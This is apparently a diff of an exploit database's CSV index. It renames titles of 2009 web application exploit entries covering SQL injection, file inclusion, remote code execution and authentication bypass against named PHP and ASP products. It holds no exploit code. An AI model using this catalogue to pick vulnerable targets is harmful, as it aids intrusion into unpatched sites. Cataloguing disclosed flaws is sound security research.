+8532,platforms/php/webapps/8532.txt,"photo-rigma.biz 30 - SQL Injection / Cross-Site Scripting",2009-04-24,YEnH4ckEr,php,webapps,0
 8533,platforms/php/webapps/8533.txt,"Pragyan CMS 2.6.4 - Multiple SQL Injections",2009-04-24,"Salvatore Fresta",php,webapps,0
 8538,platforms/php/webapps/8538.txt,"Invision Power Board 3.0.0b5 - Active Cross-Site Scripting / Full Path Disclosure",2009-04-27,brain[pillow],php,webapps,0
 8539,platforms/php/webapps/8539.txt,"Opencart 1.1.8 - 'route' Local File Inclusion",2009-04-27,OoN_Boy,php,webapps,0
 8543,platforms/php/webapps/8543.php,"LightBlog 9.9.2 - 'register.php' Remote Code Execution",2009-04-27,EgiX,php,webapps,0
-8545,platforms/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-27,d3v1l,php,webapps,0
+8545,platforms/php/webapps/8545.txt,"Dew-NewPHPLinks 2.0 - Local File Inclusion / Cross-Site Scripting",2009-04-27,d3v1l,php,webapps,0
 8546,platforms/php/webapps/8546.txt,"Thickbox Gallery 2 - 'index.php' Local File Inclusion",2009-04-27,SirGod,php,webapps,0
 8547,platforms/php/webapps/8547.txt,"EZ-Blog Beta2 - (category) SQL Injection",2009-04-27,YEnH4ckEr,php,webapps,0
 8548,platforms/php/webapps/8548.txt,"ECShop 2.5.0 - (order_sn) SQL Injection",2009-04-27,Securitylab.ir,php,webapps,0
@@ -20913,7 +20916,7 @@ id,file,description,date,author,platform,type,port
 8567,platforms/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,php,webapps,0
 8571,platforms/php/webapps/8571.txt,"Tiger Dms - (Authentication Bypass) SQL Injection",2009-04-29,"ThE g0bL!N",php,webapps,0
 8576,platforms/php/webapps/8576.pl,"Leap CMS 0.1.4 - (searchterm) Blind SQL Injection",2009-04-30,YEnH4ckEr,php,webapps,0
-8577,platforms/php/webapps/8577.txt,"Leap CMS 0.1.4 - (SQL Injection / Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities",2009-04-30,YEnH4ckEr,php,webapps,0
+8577,platforms/php/webapps/8577.txt,"Leap CMS 0.1.4 - SQL Injection / Cross-Site Scripting / Arbitrary File Upload",2009-04-30,YEnH4ckEr,php,webapps,0
 8585,platforms/php/webapps/8585.txt,"Golabi CMS 1.0.1 - Session Poisoning",2009-05-01,CrazyAngel,php,webapps,0
 8586,platforms/php/webapps/8586.txt,"MiniTwitter 0.2b - Multiple SQL Injections",2009-05-01,YEnH4ckEr,php,webapps,0
 8587,platforms/php/webapps/8587.htm,"MiniTwitter 0.2b - Remote User Options Changer Exploit",2009-05-01,YEnH4ckEr,php,webapps,0
@@ -20928,7 +20931,7 @@ id,file,description,date,author,platform,type,port
 8608,platforms/php/webapps/8608.txt,"projectCMS 1.1b - Multiple Vulnerabilities",2009-05-04,YEnH4ckEr,php,webapps,0
 8609,platforms/php/webapps/8609.pl,"Uguestbook 1.0b - (Guestbook.mdb) Arbitrary Database Disclosure",2009-05-04,Cyber-Zone,php,webapps,0
 8610,platforms/asp/webapps/8610.pl,"Ublog access version - Arbitrary Database Disclosure",2009-05-04,Cyber-Zone,asp,webapps,0
-8615,platforms/php/webapps/8615.txt,"TemaTres 1.0.3 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-05,YEnH4ckEr,php,webapps,0
+8615,platforms/php/webapps/8615.txt,"TemaTres 1.0.3 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-05,YEnH4ckEr,php,webapps,0
 8616,platforms/php/webapps/8616.pl,"TemaTres 1.0.3 - Blind SQL Injection",2009-05-05,YEnH4ckEr,php,webapps,0
 8618,platforms/php/webapps/8618.txt,"LinkBase 2.0 - Remote Cookie Grabber",2009-05-05,SirGod,php,webapps,0
 8619,platforms/php/webapps/8619.txt,"Joomla! Component Almond Classifieds 5.6.2 - Blind SQL Injection",2009-05-05,InjEctOr5,php,webapps,0
@@ -20949,7 +20952,7 @@ id,file,description,date,author,platform,type,port
 8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / Arbitrary File Upload",2009-05-11,ahmadbady,php,webapps,0
 8654,platforms/php/webapps/8654.txt,"openWYSIWYG 1.4.7 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0
 8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0
-8658,platforms/php/webapps/8658.txt,"PHP recommend 1.3 - (Authentication Bypass / Remote File Inclusion / Code Inject) Multiple Vulnerabilities",2009-05-11,scriptjunkie,php,webapps,0
+8658,platforms/php/webapps/8658.txt,"PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Inject",2009-05-11,scriptjunkie,php,webapps,0
 8659,platforms/php/webapps/8659.php,"Bitweaver 2.6 - saveFeed() Remote Code Execution",2009-05-12,Nine:Situations:Group,php,webapps,0
 8664,platforms/php/webapps/8664.pl,"BigACE 2.5 - SQL Injection",2009-05-12,YEnH4ckEr,php,webapps,0
 8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 - (script) Local File Disclosure",2009-05-13,ahmadbady,php,webapps,0
@@ -20980,8 +20983,8 @@ id,file,description,date,author,platform,type,port
 8702,platforms/php/webapps/8702.txt,"2DayBiz Custom T-shirt Design - (SQL Injection / Cross-Site Scripting) Multiple Remote Vulnerabilities",2009-05-15,snakespc,php,webapps,0
 8705,platforms/asp/webapps/8705.txt,"DMXReady Registration Manager 1.1 - Database Disclosure",2009-05-15,S4S-T3rr0r!sT,asp,webapps,0
 8706,platforms/php/webapps/8706.pl,"PHPenpals 1.1 - (mail.php ID) SQL Injection",2009-05-15,Br0ly,php,webapps,0
-8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - (Authentication Bypass / Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0
-8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0
+8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection",2009-05-15,YEnH4ckEr,php,webapps,0
+8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,php,webapps,0
 8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 - Blind SQL Injection",2009-05-18,Qabandi,php,webapps,0
 8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - (Authentication Bypass) SQL Injection",2009-05-18,snakespc,php,webapps,0
 8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' Parameter SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0
@@ -21001,7 +21004,7 @@ id,file,description,date,author,platform,type,port
 8734,platforms/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 - Remote File Disclosure",2009-05-19,Securitylab.ir,asp,webapps,0
 8735,platforms/php/webapps/8735.txt,"PAD Site Scripts 3.6 - Insecure Cookie Handling",2009-05-19,Mr.tro0oqy,php,webapps,0
 8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery 1.4.22 - Remote Exploit",2009-05-19,girex,php,webapps,0
-8737,platforms/php/webapps/8737.txt,"vidshare pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-19,snakespc,php,webapps,0
+8737,platforms/php/webapps/8737.txt,"vidshare pro - SQL Injection / Cross-Site Scripting",2009-05-19,snakespc,php,webapps,0
 8738,platforms/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b - Multiple SQL Injections",2009-05-19,YEnH4ckEr,php,webapps,0
 8739,platforms/php/webapps/8739.txt,"Dog Pedigree Online Database 1.0.1b - Insecure Cookie Handling",2009-05-19,YEnH4ckEr,php,webapps,0
 8740,platforms/php/webapps/8740.pl,"Dog Pedigree Online Database 1.0.1b - Blind SQL Injection",2009-05-19,YEnH4ckEr,php,webapps,0
@@ -21017,7 +21020,7 @@ id,file,description,date,author,platform,type,port
 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Blind SQL Injection",2009-05-20,snakespc,php,webapps,0
 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,php,webapps,0
 8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - (Authentication Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0
-8756,platforms/asp/webapps/8756.txt,"asp inline Corporate Calendar - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0
+8756,platforms/asp/webapps/8756.txt,"asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting",2009-05-21,Bl@ckbe@rD,asp,webapps,0
 8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 - Multiple SQL Injections",2009-05-21,YEnH4ckEr,php,webapps,0
 8761,platforms/php/webapps/8761.txt,"Article Directory - (Authentication Bypass) SQL Injection",2009-05-21,Hakxer,php,webapps,0
 8762,platforms/php/webapps/8762.txt,"Article Directory - 'page.php' Blind SQL Injection",2009-05-21,"ThE g0bL!N",php,webapps,0
@@ -21030,7 +21033,7 @@ id,file,description,date,author,platform,type,port
 8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts - Change Admin Password",2009-05-22,G4N0K,php,webapps,0
 8775,platforms/php/webapps/8775.txt,"Mole Group Restaurant Directory Script 3.0 - Change Admin Password",2009-05-22,G4N0K,php,webapps,0
 8776,platforms/php/webapps/8776.txt,"photovideotube 1.11 - Multiple Vulnerabilities",2009-05-22,Hakxer,php,webapps,0
-8778,platforms/php/webapps/8778.txt,"minitwitter 0.3-beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-26,YEnH4ckEr,php,webapps,0
+8778,platforms/php/webapps/8778.txt,"minitwitter 0.3-beta - SQL Injection / Cross-Site Scripting",2009-05-26,YEnH4ckEr,php,webapps,0
 8779,platforms/php/webapps/8779.txt,"Joomla! Component Boy Scout Advancement 0.3 - 'id' SQL Injection",2009-05-26,YEnH4ckEr,php,webapps,0
 8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion",2009-05-26,girex,php,webapps,0
 8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza 2.x - (vbplaza.php) Blind SQL Injection",2009-05-26,"Cold Zero",php,webapps,0
@@ -21060,8 +21063,8 @@ id,file,description,date,author,platform,type,port
 8816,platforms/php/webapps/8816.txt,"SiteX 0.7.4.418 - (THEME_FOLDER) Local File Inclusion",2009-05-27,ahmadbady,php,webapps,0
 8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 - 'cat_id' SQL Injection",2009-05-27,taRentReXx,php,webapps,0
 8818,platforms/php/webapps/8818.txt,"Impact Software AdPeeps 8.5d1 - Cross-Site Scripting / HTML Injection",2009-05-27,intern0t,php,webapps,0
-8819,platforms/php/webapps/8819.txt,"small pirate 2.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-05-29,YEnH4ckEr,php,webapps,0
-8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - (Cross-Site Scripting / SQL Injection / HTML Injection) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0
+8819,platforms/php/webapps/8819.txt,"small pirate 2.1 - Cross-Site Scripting / SQL Injection",2009-05-29,YEnH4ckEr,php,webapps,0
+8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - Cross-Site Scripting / SQL Injection / HTML Injection",2009-05-29,intern0t,php,webapps,0
 8821,platforms/php/webapps/8821.txt,"Joomla! Component JVideo 0.3.x - SQL Injection",2009-05-29,"Chip d3 bi0s",php,webapps,0
 8823,platforms/php/webapps/8823.txt,"212Cafe WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0
 8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0
@@ -21072,7 +21075,7 @@ id,file,description,date,author,platform,type,port
 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0
 8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) SQL Injection",2009-06-01,Br0ly,php,webapps,0
 8836,platforms/php/webapps/8836.txt,"OCS Inventory NG 1.02 - Multiple SQL Injections",2009-06-01,"Nico Leidecker",php,webapps,0
-8838,platforms/php/webapps/8838.txt,"elitecms 1.01 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-01,xeno_hive,php,webapps,0
+8838,platforms/php/webapps/8838.txt,"elitecms 1.01 - SQL Injection / Cross-Site Scripting",2009-06-01,xeno_hive,php,webapps,0
 8839,platforms/php/webapps/8839.txt,"Open-school 1.0 - 'id' SQL Injection",2009-06-01,OzX,php,webapps,0
 8840,platforms/php/webapps/8840.txt,"Escon SupportPortal Pro 3.0 - (tid) Blind SQL Injection",2009-06-01,OzX,php,webapps,0
 8841,platforms/php/webapps/8841.txt,"unclassified NewsBoard 1.6.4 - Multiple Vulnerabilities",2009-06-01,girex,php,webapps,0
@@ -21087,9 +21090,9 @@ id,file,description,date,author,platform,type,port
 8853,platforms/php/webapps/8853.txt,"Online Grades & Attendance 3.2.6 - Multiple Local File Inclusion",2009-06-02,YEnH4ckEr,php,webapps,0
 8854,platforms/php/webapps/8854.pl,"Online Grades & Attendance 3.2.6 - Blind SQL Injection",2009-06-02,YEnH4ckEr,php,webapps,0
 8855,platforms/php/webapps/8855.txt,"Alstrasoft Article Manager Pro - Arbitrary File Upload",2009-06-02,ZoRLu,php,webapps,0
-8856,platforms/php/webapps/8856.txt,"flashlight free edition - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-06-02,K4m1k451,php,webapps,0
+8856,platforms/php/webapps/8856.txt,"flashlight free edition - Local File Inclusion / SQL Injection",2009-06-02,K4m1k451,php,webapps,0
 8857,platforms/php/webapps/8857.txt,"WebCal - 'webCal3_detail.asp event_id' SQL Injection",2009-06-02,Bl@ckbe@rD,php,webapps,0
-8858,platforms/php/webapps/8858.txt,"propertymax pro free - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-02,SirGod,php,webapps,0
+8858,platforms/php/webapps/8858.txt,"propertymax pro free - SQL Injection / Cross-Site Scripting",2009-06-02,SirGod,php,webapps,0
 8859,platforms/asp/webapps/8859.txt,"WebEyes Guest Book 3 - 'yorum.asp mesajid' SQL Injection",2009-06-02,Bl@ckbe@rD,asp,webapps,0
 8860,platforms/php/webapps/8860.txt,"Podcast Generator 1.2 - 'GLOBALS[]' Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0
 8864,platforms/php/webapps/8864.txt,"My Mini Bill - (orderid) SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0
@@ -21120,7 +21123,7 @@ id,file,description,date,author,platform,type,port
 8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0
 8898,platforms/php/webapps/8898.txt,"Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion",2009-06-08,"Chip d3 bi0s",php,webapps,0
 8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 - (source_class) SQL Injection",2009-06-08,snakespc,php,webapps,0
-8901,platforms/php/webapps/8901.txt,"virtue news - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-08,snakespc,php,webapps,0
+8901,platforms/php/webapps/8901.txt,"virtue news - SQL Injection / Cross-Site Scripting",2009-06-08,snakespc,php,webapps,0
 8902,platforms/php/webapps/8902.htm,"Grestul 1.2 - Remote Add Administrator Account Exploit",2009-06-08,"ThE g0bL!N",php,webapps,0
 8903,platforms/php/webapps/8903.txt,"DM FileManager 3.9.2 - Insecure Cookie Handling",2009-06-08,"ThE g0bL!N",php,webapps,0
 8904,platforms/php/webapps/8904.txt,"Automated link exchange portal 1.3 - Multiple Vulnerabilities",2009-06-08,TiGeR-Dz,php,webapps,0
@@ -21140,30 +21143,30 @@ id,file,description,date,author,platform,type,port
 8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - System Config Disclosure",2009-06-10,StAkeR,php,webapps,0
 8924,platforms/php/webapps/8924.txt,"School Data Navigator - (page) Local / Remote File Inclusion",2009-06-10,Br0ly,php,webapps,0
 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script - (Authentication Bypass) Insecure Cookie Handling",2009-06-10,N@bilX,php,webapps,0
-8926,platforms/php/webapps/8926.txt,"mrcgiguy freeticket - (Cookie Handling / SQL Injection) Multiple Vulnerabilities",2009-06-10,"ThE g0bL!N",php,webapps,0
+8926,platforms/php/webapps/8926.txt,"mrcgiguy freeticket - Cookie Handling / SQL Injection",2009-06-10,"ThE g0bL!N",php,webapps,0
 8927,platforms/php/webapps/8927.pl,"Open Biller 0.1 - 'Username' Blind SQL Injection",2009-06-10,YEnH4ckEr,php,webapps,0
 8928,platforms/php/webapps/8928.txt,"PHPWebThings 1.5.2 - (help.php module) Local File Inclusion",2009-06-11,Br0ly,php,webapps,0
 8929,platforms/php/webapps/8929.txt,"Splog 1.2 Beta - Multiple SQL Injections",2009-06-11,YEnH4ckEr,php,webapps,0
 8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 - (deleteTorrent) Delete Arbitrary File",2009-06-11,Br0ly,php,webapps,0
-8932,platforms/php/webapps/8932.txt,"yogurt 0.3 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-06-11,Br0ly,php,webapps,0
+8932,platforms/php/webapps/8932.txt,"yogurt 0.3 - Cross-Site Scripting / SQL Injection",2009-06-11,Br0ly,php,webapps,0
 8933,platforms/php/webapps/8933.php,"Sniggabo CMS - 'article.php id' SQL Injection",2009-06-11,Lidloses_Auge,php,webapps,0
 8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - (Authentication Bypass) SQL Injection",2009-06-12,ByALBAYX,php,webapps,0
 8936,platforms/php/webapps/8936.txt,"4Images 1.7.7 - Filter Bypass HTML Injection / Cross-Site Scripting",2009-06-12,Qabandi,php,webapps,0
-8937,platforms/php/webapps/8937.txt,"campus virtual-lms - (Cross-Site Scripting /
SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0
+8937,platforms/php/webapps/8937.txt,"campus virtual-lms - Cross-Site Scripting / SQL Injection",2009-06-12,Yasión,php,webapps,0
 8939,platforms/php/webapps/8939.pl,"phpWebThings 1.5.2 - MD5 Hash Retrieve/File Disclosure",2009-06-12,StAkeR,php,webapps,0
 8941,platforms/php/webapps/8941.txt,"pivot 1.40.4-7 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0
 8942,platforms/php/webapps/8942.txt,"tbdev 01-01-2008 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0
-8943,platforms/php/webapps/8943.txt,"translucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0
+8943,platforms/php/webapps/8943.txt,"TransLucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0
 8944,platforms/php/webapps/8944.txt,"Uebimiau Web-Mail 3.2.0-1.8 - Remote File / Overwrite",2009-06-12,GoLd_M,php,webapps,0
 8946,platforms/php/webapps/8946.txt,"Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion",2009-06-15,ByALBAYX,php,webapps,0
-8947,platforms/php/webapps/8947.txt,"impleo music Collection 2.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0
+8947,platforms/php/webapps/8947.txt,"impleo music Collection 2.0 - SQL Injection / Cross-Site Scripting",2009-06-15,SirGod,php,webapps,0
 8948,platforms/php/webapps/8948.txt,"Mundi Mail 0.8.2 - (top) Remote File Inclusion",2009-06-15,Br0ly,php,webapps,0
 8949,platforms/php/webapps/8949.txt,"SugarCRM 5.2.0e - Remote Code Execution",2009-06-15,USH,php,webapps,0
 8950,platforms/php/webapps/8950.txt,"formmail 1.92 - Multiple Vulnerabilities",2009-06-15,USH,php,webapps,0
 8951,platforms/php/webapps/8951.php,"DB Top Sites 1.0 - Remote Command Execution",2009-06-15,SirGod,php,webapps,0
 8952,platforms/php/webapps/8952.txt,"DB Top Sites 1.0 - (index.php u) Local File Inclusion",2009-06-15,SirGod,php,webapps,0
 8953,platforms/php/webapps/8953.txt,"elvin bts 1.2.0 - Multiple
Vulnerabilities",2009-06-15,SirGod,php,webapps,0
-8954,platforms/php/webapps/8954.txt,"adaptweb 0.9.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0
+8954,platforms/php/webapps/8954.txt,"adaptweb 0.9.2 - Local File Inclusion / SQL Injection",2009-06-15,SirGod,php,webapps,0
 8956,platforms/php/webapps/8956.htm,"Evernew Free Joke Script 1.2 - Remote Change Password Exploit",2009-06-15,Hakxer,php,webapps,0
 8958,platforms/php/webapps/8958.txt,"torrenttrader classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0
 8959,platforms/php/webapps/8959.pl,"Joomla! Component com_iJoomla_rss - Blind SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0
@@ -21180,12 +21183,12 @@ id,file,description,date,author,platform,type,port
 8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion",2009-06-17,YEnH4ckEr,php,webapps,0
 8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - (name) Blind SQL Injection",2009-06-17,YEnH4ckEr,php,webapps,0
 8981,platforms/php/webapps/8981.txt,"PHPortal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0
-8984,platforms/php/webapps/8984.txt,"CMS buzz - (Cross-Site Scripting / Password Change/HTML Injection) Multiple Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0
+8984,platforms/php/webapps/8984.txt,"CMS buzz - Cross-Site Scripting / Password Change / HTML Injection",2009-06-18,"ThE g0bL!N",php,webapps,0
 8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 - (Authentication Bypass) Insecure Cookie Handling",2009-06-22,HxH,cgi,webapps,0
 8988,platforms/php/webapps/8988.txt,"pc4 Uploader 10.0 - Remote File Disclosure",2009-06-22,Qabandi,php,webapps,0
 8990,platforms/php/webapps/8990.txt,"phpDatingClub 3.7 - SQL Injection / Cross-Site Scripting Injection",2009-06-22,"ThE g0bL!N",php,webapps,0
 8992,platforms/php/webapps/8992.php,"phpMyAdmin - pmaPWN! Code Injection Remote Code Execution Scanner & Exploit Tool",2009-06-22,"Hacking Expose!",php,webapps,0
-8993,platforms/php/webapps/8993.txt,"elgg - (Cross-Site Scripting / Cross-Site Request Forgery/Change Password) Multiple Vulnerabilities",2009-06-22,lorddemon,php,webapps,0
+8993,platforms/php/webapps/8993.txt,"elgg - Cross-Site Scripting / Cross-Site Request Forgery / Change Password",2009-06-22,lorddemon,php,webapps,0
 8994,platforms/php/webapps/8994.txt,"AWScripts Gallery Search Engine 1.x - Insecure Cookie",2009-06-22,TiGeR-Dz,php,webapps,0
 8995,platforms/php/webapps/8995.txt,"Campsite 3.3.0 RC1 - Multiple Remote File Inclusion",2009-06-22,CraCkEr,php,webapps,0
 8996,platforms/php/webapps/8996.txt,"Gravy Media Photo Host 1.0.8 - Local File Disclosure",2009-06-22,Lo$er,php,webapps,0
@@ -21196,11 +21199,11 @@ id,file,description,date,author,platform,type,port
 9001,platforms/php/webapps/9001.php,"MyBB 1.4.6 - Remote Code Execution",2009-06-22,The:Paradox,php,webapps,0
 9004,platforms/php/webapps/9004.txt,"Zen Cart 1.3.8 - Remote Code Execution",2009-06-23,BlackH,php,webapps,0
 9005,platforms/php/webapps/9005.py,"Zen Cart 1.3.8 - SQL Execution Exploit",2009-06-23,BlackH,php,webapps,0
-9008,platforms/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-23,CraCkEr,php,webapps,0
+9008,platforms/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-06-23,CraCkEr,php,webapps,0
 9009,platforms/php/webapps/9009.txt,"BASE 1.2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-06-24,"Tim Medin",php,webapps,0
 9010,platforms/php/webapps/9010.txt,"Glossword 1.8.11 - (index.php x) Local File Inclusion",2009-06-24,t0fx,php,webapps,0
 9011,platforms/php/webapps/9011.txt,"Joomla! Component com_pinboard - Arbitrary File Upload",2009-06-24,ViRuSMaN,php,webapps,0
-9012,platforms/php/webapps/9012.txt,"Tribiq CMS 5.0.12c - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2009-06-24,CraCkEr,php,webapps,0
+9012,platforms/php/webapps/9012.txt,"Tribiq CMS 5.0.12c - Cross-Site Scripting / Local File Inclusion",2009-06-24,CraCkEr,php,webapps,0
 9014,platforms/php/webapps/9014.txt,"PHPEcho CMS 2.0-rc3 - (forum) Cross-Site Scripting Cookie Stealing / Blind",2009-06-24,JosS,php,webapps,0
 9015,platforms/php/webapps/9015.txt,"LightOpenCMS 0.1 - (smarty.php cwd) Local File Inclusion",2009-06-24,JosS,php,webapps,0
 9016,platforms/php/webapps/9016.txt,"Joomla! Component com_amocourse - 'catid' SQL Injection",2009-06-24,"Chip d3 bi0s",php,webapps,0
@@ -21209,7 +21212,7 @@ id,file,description,date,author,platform,type,port
 9019,platforms/php/webapps/9019.txt,"AlumniServer 1.0.1 - (Authentication Bypass) SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0
 9020,platforms/php/webapps/9020.py,"AlumniServer 1.0.1 - (resetpwemail) Blind SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0
 9021,platforms/php/webapps/9021.txt,"MD-Pro 1.083.x - Survey Module (pollID) Blind SQL Injection",2009-06-25,XaDoS,php,webapps,0
-9022,platforms/php/webapps/9022.txt,"Virtue Online Test Generator - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-26,HxH,php,webapps,0
+9022,platforms/php/webapps/9022.txt,"Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-06-26,HxH,php,webapps,0
 9023,platforms/php/webapps/9023.txt,"PHP-Address Book 4.0.x - Multiple SQL Injections",2009-06-26,YEnH4ckEr,php,webapps,0
 9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - (Authentication Bypass) SQL Injection",2009-06-26,"ThE g0bL!N",php,webapps,0
 9025,platforms/php/webapps/9025.txt,"Mega File Manager 1.0 - 'index.php' Local File Inclusion",2009-06-26,SirGod,php,webapps,0
@@ -21255,7 +21258,7 @@ id,file,description,date,author,platform,type,port
 9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0
 9089,platforms/php/webapps/9089.txt,"ClearContent - 'image.php url' Remote File Inclusion / Local File Inclusion",2009-07-09,MizoZ,php,webapps,0
 9091,platforms/php/webapps/9091.php,"Mlffat 2.2 - Blind SQL Injection",2009-07-09,Qabandi,php,webapps,0
-9092,platforms/php/webapps/9092.txt,"webasyst shop-script - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-09,Vrs-hCk,php,webapps,0
+9092,platforms/php/webapps/9092.txt,"webasyst shop-script - Blind SQL Injection / Cross-Site Scripting",2009-07-09,Vrs-hCk,php,webapps,0
 9094,platforms/php/webapps/9094.txt,"EasyVillaRentalSite - 'id' SQL Injection",2009-07-09,BazOka-HaCkEr,php,webapps,0
 9095,platforms/php/webapps/9095.txt,"TalkBack 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0
 9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x - SQL Injection / phpinfo()",2009-07-09,NoGe,php,webapps,0
@@ -21269,14 +21272,14 @@ id,file,description,date,author,platform,type,port
 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0
 9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0
 9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0
-9118,platforms/php/webapps/9118.txt,"ebay clone 2009 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities",2009-07-10,Moudi,php,webapps,0
+9118,platforms/php/webapps/9118.txt,"ebay clone 2009 - Cross-Site Scripting / Blind SQL Injection",2009-07-10,Moudi,php,webapps,0
 9119,platforms/php/webapps/9119.txt,"LionWiki - 'index.php' Local File Inclusion",2009-07-10,MoDaMeR,php,webapps,0
 9121,platforms/php/webapps/9121.php,"Morcego CMS 1.7.6 - Blind SQL Injection",2009-07-10,darkjoker,php,webapps,0
